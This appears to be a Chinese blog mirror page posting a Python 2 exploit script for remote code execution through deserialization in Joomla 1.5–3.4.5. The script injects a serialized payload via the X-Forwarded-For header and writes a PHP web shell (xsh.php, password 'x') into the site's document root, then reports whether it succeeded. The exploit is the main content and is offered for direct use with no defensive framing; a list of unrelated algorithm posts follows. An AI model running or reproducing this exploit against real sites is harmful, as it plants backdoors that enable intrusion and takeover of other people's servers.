zoukankan      html  css  js  c++  java

  • Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)

    Usage:x.py http://xxx.com

    # coding=utf-8
    # author:KuuKi
    # Help: joomla 1.5-3.4.5 unserialize remote code execution

    import urllib2
    import cookielib,sys
    cj = cookielib.CookieJar()
    opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
    urllib2.install_opener(opener)
    urllib2.socket.setdefaulttimeout(10)

    payload = 'file_put_contents($_SERVER["DOCUMENT_ROOT"].chr(47)."xsh.php","x3C".chr(63)."@eval(x5Cx24_POST[x]);")'

    forward = '}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"x5C0x5C0x5C0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:' + str(len(payload)+28) + ':"' + payload + ';JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"x5C0x5C0x5C0connection";b:1;}xF0x9Dx8Cx86'
    req = urllib2.Request(url=sys.argv[1],headers={'x-forwarded-for':forward})
    opener.open(req)
    req = urllib2.Request(url=sys.argv[1])
    if 'SimplePie_Misc::parse_url' in opener.open(req).read():
        print 'Shell: '+ sys.argv[1] + '/xsh.php Password: x'
    else:
        print 'Unvunerable!'
  • 相关阅读:
    L1-050. 倒数第N个字符串
    全排列问题(递归)
    L2-014. 列车调度
    连通 OR 不连通(NOJ 1044)
    数三角形(codevs 3693)
    Min(BZOJ 1441)
    STL中heap用法
    军训分批(codevs 2751)
    团伙(codevs 2597)
    Subsequence(hdu 3530)
  • 原文地址:https://www.cnblogs.com/milantgh/p/5193723.html
Copyright © 2011-2022 走看看